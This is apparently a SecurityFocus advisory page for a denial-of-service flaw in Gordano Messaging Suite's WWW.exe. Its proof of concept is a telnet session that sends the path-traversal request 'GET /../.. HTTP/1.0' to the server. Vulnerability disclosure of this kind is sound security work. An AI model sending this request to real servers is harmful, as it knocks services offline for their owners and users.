info
discussion
exploit
solution
references
Gordano Messaging Suite WWW.exe Denial of Service Vulnerability
The following proof of concept was provided:
~$ telnet 127.0.0.1
Trying 127.0.0.1...
Connected to 127.0.0.1
Escape character is '^]'.
GET /../.. HTTP/1.0
Privacy Statement
Copyright 2010, SecurityFocus